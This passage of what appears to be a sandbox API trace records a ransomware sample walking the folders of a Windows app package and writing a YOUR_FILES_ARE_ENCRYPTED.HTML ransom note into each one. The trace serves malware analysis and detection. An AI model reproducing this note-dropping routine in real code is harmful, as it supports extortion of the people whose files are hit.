ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0121.040] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName="..", cAlternateFileName="")) returned 1 [0121.040] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName="..", cAlternateFileName="")) returned 0 [0121.040] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0121.040] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0121.040] GetProcessHeap () returned 0x600000 [0121.040] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.041] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.042] CloseHandle (hObject=0x320) returned 1 [0121.042] GetProcessHeap () returned 0x600000 [0121.042] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.042] GetProcessHeap () returned 0x600000 [0121.042] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.043] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="Temp", cAlternateFileName="")) returned 1 [0121.043] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.043] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp") returned 90 [0121.043] GetProcessHeap () returned 0x600000 [0121.043] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.044] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp" [0121.044] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\*" [0121.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.044] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName="..", cAlternateFileName="")) returned 1 [0121.044] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecc0, dwReserved1=0x62f790, cFileName="..", cAlternateFileName="")) returned 0 [0121.045] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.045] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0121.045] GetProcessHeap () returned 0x600000 [0121.045] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.045] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.047] CloseHandle (hObject=0x320) returned 1 [0121.047] GetProcessHeap () returned 0x600000 [0121.047] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.047] GetProcessHeap () returned 0x600000 [0121.047] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.048] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x365bf3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x365bf3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x365bf3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="Temp", cAlternateFileName="")) returned 0 [0121.048] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.048] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0121.048] GetProcessHeap () returned 0x600000 [0121.048] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.049] WriteFile (in: hFile=0x324, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.050] CloseHandle (hObject=0x324) returned 1 [0121.050] GetProcessHeap () returned 0x600000 [0121.050] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.050] GetProcessHeap () returned 0x600000 [0121.050] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.050] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0121.050] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.050] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData") returned 90 [0121.050] GetProcessHeap () returned 0x600000 [0121.050] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.050] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData" [0121.050] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\*" [0121.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.051] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 1 [0121.051] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6fb4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2a6fb4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2a6fb4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 0 [0121.051] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.051] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0121.051] GetProcessHeap () returned 0x600000 [0121.051] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.051] WriteFile (in: hFile=0x324, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.053] CloseHandle (hObject=0x324) returned 1 [0121.053] GetProcessHeap () returned 0x600000 [0121.053] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.053] GetProcessHeap () returned 0x600000 [0121.053] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.053] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x280f99, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x280f99, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x280f99, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0121.053] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.053] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache") returned 93 [0121.053] GetProcessHeap () returned 0x600000 [0121.053] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.054] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache" [0121.054] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\*" [0121.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x280f99, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x280f99, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x280f99, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName=".", cAlternateFileName="")) returned 0x626778 [0121.054] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x280f99, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x280f99, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x280f99, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 1 [0121.054] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x280f99, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x280f99, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x280f99, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 0 [0121.055] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0121.055] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.055] GetProcessHeap () returned 0x600000 [0121.055] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.056] WriteFile (in: hFile=0x324, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.057] CloseHandle (hObject=0x324) returned 1 [0121.057] GetProcessHeap () returned 0x600000 [0121.057] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0121.057] GetProcessHeap () returned 0x600000 [0121.057] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.057] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0121.057] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.057] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState") returned 93 [0121.057] GetProcessHeap () returned 0x600000 [0121.057] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.058] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState" [0121.058] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\*" [0121.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.058] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 1 [0121.058] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25a978, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x25a978, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x25a978, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f82e, dwReserved1=0x62f788, cFileName="..", cAlternateFileName="")) returned 0 [0121.058] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.059] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.059] GetProcessHeap () returned 0x600000 [0121.059] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0121.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunemusic_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 